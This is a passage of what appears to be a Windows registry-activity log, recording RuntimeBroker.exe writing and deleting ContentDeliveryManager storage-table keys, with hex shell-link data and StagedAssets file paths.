0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000bd5c8d971000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c38353933346264633834373434393664333535656661386536343139383932643730333336343339623237356333653866656133666339356233353330643065000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c666b74646a676c0000000000000000a44b8cdb1f8b62419716f05434714491f84023b526feee11921ede6b303c5000a44b8cdb1f8b62419716f05434714491f84023b526feee11921ede6b303c5000d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0032003800310038003600390031003400360035002d0033003000340033003900340037003600310039002d0032003400370035003100380032003700360033002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000066def5a8000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6d7512ea-4e64-485a RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\363f95ea-4784-4ec5 = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000009892b6c4d39cda019892b6c4d39cda019892b6c4d39cda01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000a25810a82000366332653934636136653565313632336632366236656430393433663566643364613764356161343437303330303366353164656366386133373734393761620000b20009000400efbea25810a8a25810a82e0000000000000000000000000000000000000000000000000068056800360063003200650039003400630061003600650035006500310036003200330066003200360062003600650064003000390034003300660035006600640033006400610037006400350061006100340034003700300033003000300033006600350031006400650063006600380061003300370037003400390037006100620000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000bd5c8d971000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c36633265393463613665356531363233663236623665643039343366356664336461376435616134343730333030336635316465636638613337373439376162000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c666b74646a676c0000000000000000a44b8cdb1f8b62419716f05434714491fa4023b526feee11921ede6b303c5000a44b8cdb1f8b62419716f05434714491fa4023b526feee11921ede6b303c5000d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0032003800310038003600390031003400360035002d0033003000340033003900340037003600310039002d0032003400370035003100380032003700360033002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000066def5a8000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6d7512ea-4e64-485a = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a175b24e-86bd-44aa RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b6420cbb-1deb-4e02 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a175b24e-86bd-44aa = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c9166f7d-ca3b-41a6 = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\363f95ea-4784-4ec5 = e621bcc4d39cda01 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4e352fc7-1602-416c = "0" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c9166f7d-ca3b-41a6 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6d7512ea-4e64-485a = "\\\\?\\Volume{A8F5DE66-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\ee95bd4236780f79f526dd5ea0a2eb4babbc32e9c11b063181659222d8260af5" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1311bad5-54fb-4f0d = 4e2b70c5d39cda01 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4e352fc7-1602-416c RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22b10265-b4a8-4ec8 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cf6c506f-c2e8-4206 = 528998c5d39cda01 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cf6c506f-c2e8-4206 = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a175b24e-86bd-44aa = "\\\\?\\Volume{A8F5DE66-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\82b2a6e3845d7882014a9163a68b36151d22befbfbe4ab32fc70398b51a2fbfc" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5effaf81-9b9f-4aa1 = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\65cd42bf-a0c0-4457 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\363f95ea-4784-4ec5 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\65cd42bf-a0c0-4457 = "0" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1311bad5-54fb-4f0d RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\55d6e340-05c6-4c91 = "\\\\?\\Volume{A8F5DE66-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\23b0b99cf683073623dae791bd972cd3330df7677008731655e4a278fb35deed" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1311bad5-54fb-4f0d = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000004568edc4d39cda010eed53c5d39cda010eed53c5d39cda01190506000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000a25810a82000383262326136653338343564373838323031346139313633613638623336313531643232626566626662653461623332666337303339386235316132666266630000b20009000400efbea25810a8a25810a82e00000000000000000000000000000000000000000000000000497b7d00380032006200320061003600650033003800340035006400370038003800320030003100340061003900310036003300610036003800620033003600310035003100640032003200620065006600620066006200650034006100620033003200660063003700300033003900380062003500310061003200660062006600630000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000bd5c8d971000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c38326232613665333834356437383832303134613931363361363862333631353164323262656662666265346162333266633730333938623531613266626663000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c666b74646a676c0000000000000000a44b8cdb1f8b62419716f05434714491fe4023b526feee11921ede6b303c5000a44b8cdb1f8b62419716f05434714491fe4023b526feee11921ede6b303c5000d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0032003800310038003600390031003400360035002d0033003000340033003900340037003600310039002d0032003400370035003100380032003700360033002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000066def5a8000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f6bd7407-8d63-4c2d = "0" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5effaf81-9b9f-4aa1 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\363f95ea-4784-4ec5 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9303fc52-351a-4d35 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5effaf81-9b9f-4aa1 = ed51b1c4d39cda01 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5effaf81-9b9f-4aa1 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\65cd42bf-a0c0-4457 = 0f1251c5d39cda01 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4e352fc7-1602-416c = "\\\\?\\Volume{A8F5DE66-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\23b0b99cf683073623dae791bd972cd3330df7677008731655e4a278fb35deed" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22b10265-b4a8-4ec8 = dde5a8c4d39cda01 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9303fc52-351a-4d35 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\65cd42bf-a0c0-4457 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b6420cbb-1deb-4e02 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22b10265-b4a8-4ec8 = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1311bad5-54fb-4f0d = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cf6c506f-c2e8-4206 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000932cf2c4d39cda018b3981c5d39cda018b3981c5d39cda01619206000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000a25810a82000366332653934636136653565313632336632366236656430393433663566643364613764356161343437303330303366353164656366386133373734393761620000b20009000400efbea25810a8a25810a82e0000000000000000000000000000000000000000000000000068056800360063003200650039003400630061003600650035006500310036003200330066003200360062003600650064003000390034003300660035006600640033006400610037006400350061006100340034003700300033003000300033006600350031006400650063006600380061003300370037003400390037006100620000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000bd5c8d971000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c36633265393463613665356531363233663236623665643039343366356664336461376435616134343730333030336635316465636638613337373439376162000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c666b74646a676c0000000000000000a44b8cdb1f8b62419716f05434714491014123b526feee11921ede6b303c5000a44b8cdb1f8b62419716f05434714491014123b526feee11921ede6b303c5000d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0032003800310038003600390031003400360035002d0033003000340033003900340037003600310039002d0032003400370035003100380032003700360033002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000066def5a8000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1311bad5-54fb-4f0d = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9303fc52-351a-4d35 = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5effaf81-9b9f-4aa1 = "8324" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c9166f7d-ca3b-41a6 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000cbcdb1c4d39cda01cbcdb1c4d39cda01cbcdb1c4d39cda01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000a25810a82000646233653261306466616364396334336537363336666564626462343665363566393061376532393064346534306661393766323863653832653335663664640000b20009000400efbea25810a8a25810a82e0000000000000000000000000000000000000000000000000035ca6c00640062003300650032006100300064006600610063006400390063003400330065003700360033003600660065006400620064006200340036006500360035006600390030006100370065003200390030006400340065003400300066006100390037006600320038006300650038003200650033003500660036006400640000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000bd5c8d971000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64623365326130646661636439633433653736333666656462646234366536356639306137653239306434653430666139376632386365383265333566366464000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c666b74646a676c0000000000000000a44b8cdb1f8b62419716f05434714491f94023b526feee11921ede6b303c5000a44b8cdb1f8b62419716f05434714491f94023b526feee11921ede6b303c5000d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0032003800310038003600390031003400360035002d0033003000340033003900340037003600310039002d0032003400370035003100380032003700360033002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000066def5a8000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (int) 